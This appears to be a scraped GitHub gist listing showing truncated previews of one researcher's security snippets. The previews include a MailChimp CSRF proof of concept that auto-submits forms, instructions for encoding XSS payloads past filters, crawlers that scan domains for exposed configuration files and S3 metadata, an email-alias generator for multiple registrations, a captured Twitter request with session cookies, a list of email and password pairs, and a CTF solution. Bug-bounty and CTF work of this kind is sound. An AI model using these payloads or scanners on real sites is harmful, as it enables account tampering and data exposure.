This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import httplib, urllib | |
| print "|------------------------------------------------------------|" | |
| print "|------------------------------------------------------------|" | |
| print "|------------------------Classic-----------------------------|" | |
| print "|------------ Long slash Attack ---------------|" | |
| print "|------------ By ---------------|" |
YasserGersy
/ mailchimp.html
Last active
August 30, 2016 04:39
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html><html><head> | |
| <title> MailChimp CSRF Proof Of Concept</title> | |
| <script type="text/javascript"> | |
| var t='0'; | |
| function exec(){if (t!='1') exec1(); } | |
| function exec1() { document.getElementById('form1').submit(); | |
| setTimeout(exec2, 3000);} | |
| function exec2(){ | |
| document.getElementById('form2').submit(); | |
| document.getElementById('r3').innerText='you just got hacked , i have changed your info';t='1'; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [email protected] :123!@#qweQWE | |
| [email protected] :123!@#qweQWE | |
| [email protected] :123!@#qweQWE | |
| [email protected] :123!@#qweQWE | |
| [email protected] :123!@#qweQWE | |
| [email protected] :123!@#qweQWE | |
| [email protected] :123!@#qweQWE | |
| [email protected] :123!@#qweQWE | |
| [email protected] :123!@#qweQWE | |
| [email protected] :123!@#qweQWE |
YasserGersy
/ Email_Alias_Generator.py
Last active
October 22, 2016 16:32
generate valid email aliases for multi registeration with single email
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #bin/python | |
| #Written by @yassergersy | |
| #generate valid email aliases for multi registeration with single email | |
| #Original at https://gist.github.com/YasserGersy/29f195c0e1506b867f3e1914b1098d91 | |
| import os,sys | |
| def PlusFactorial(num): | |
| # 4 + 3 + 2 + 1 | |
| res=0 | |
| while num !=0: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| POST /account/create HTTP/1.1 | |
| Host: twitter.com | |
| User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:48.0) Gecko/20100101 Firefox/48.0 | |
| Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | |
| Accept-Language: en-US,en;q=0.5 | |
| Referer: https://twitter.com/signup | |
| Upgrade-Insecure-Requests: 1 | |
| Cookie: _twitter_sess=BAh7DCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCLPLFJBXAToMY3NyZl9p%250AZCIlM2YzZjUxZTc4Mzk4YjI3NmIzZTQ4ODY5ZDFiYmQwYzM6B2lkIiVkNDAx%250AZTIwZTk1M2JhMWIwODdkYTE2YTJjNTZlMTAwYjoSZ2V0X3RpbWVzdGFtcGwr%250ACLgW15BXAToQZ3Vlc3RfdG9rZW4iGDkyMjAyNDQyMDU4NjE4OTk5MDQ6Gmd1%250AZXN0X3Rva2VuX3RpbWVzdGFtcGwrCNMW15BXAQ%253D%253D--995b59bb710943f62537e0b4d299c39394a75fec; guest_id=v1%3A147559106449708223; _ga=GA1.2.1855789897.1475591126; pid="v3:1475591149327873419505391"; __utma=43838368.1855789897.1475591126.1475591334.1475591334.1; __utmc=43838368; __utmz=43838368.1475591334.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _gat=1 | |
| Connec |
YasserGersy
/ Configuration_crawler.py
Last active
November 19, 2018 14:57
Configuration crawler to scan available sensitive configuration finles
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests,time,sys,os | |
| requests.adapters.DEFAULT_RETRIES = 2 | |
| requests.packages.urllib3.disable_warnings() | |
| from requests.packages.urllib3.util.retry import Retry | |
| from requests.adapters import HTTPAdapter | |
| s = requests.Session() | |
| retries = Retry(total=5, |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests,time,sys,os | |
| requests.adapters.DEFAULT_RETRIES = 2 | |
| from requests.packages.urllib3.util.retry import Retry | |
| from requests.adapters import HTTPAdapter | |
| s = requests.Session() |
YasserGersy
/ x-amz-meta-s3cmd-attrs.py
Created
September 16, 2017 23:34
Scan domains against x-amz-meta-s3cmd-attrs information disclosure
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests,sys | |
| requests.packages.urllib3.disable_warnings() | |
| if len(sys.argv)<2: | |
| path='final.txt' | |
| else: | |
| path=sys.argv[1] | |
| vulnerable=[] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #The main purpose is to bypass xss filters and execute multi lines payload | |
| #write your payload to a file.txt | |
| #run the script and pass the file as argument | |
| # $python js2S.py file.txt | |
| # copy the output and pass the output paylad to a javascript function document.write or eval ,, etc , | |
| #for example , http://vuln2-xss.com/?name=document.write(__output__) | |
| #if any character from the following is filtered , remove it. | |
| import sys,os |
YasserGersy
/ secretbox-sol.py
Last active
March 3, 2018 20:19
Cyber-talent secretbox solution secret-box
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #CTF https://cybertalents.com/competitions/quals-uae-egy-national-cyber-security-ctf-2018/secret-box | |
| #https://s3-eu-west-1.amazonaws.com/hubchallenges/Reverse/secretbox.zip | |
| # | |
| # | |
| #The code takes the message | |
| #reveres it | |
| # msg bitwised with the length of image file name | |
| #Each char at i postioton in the MSG is stored in the image at postition [0,i][3] | |
| # | |
| #python secretbox-sol.py secret.png |
OlderNewer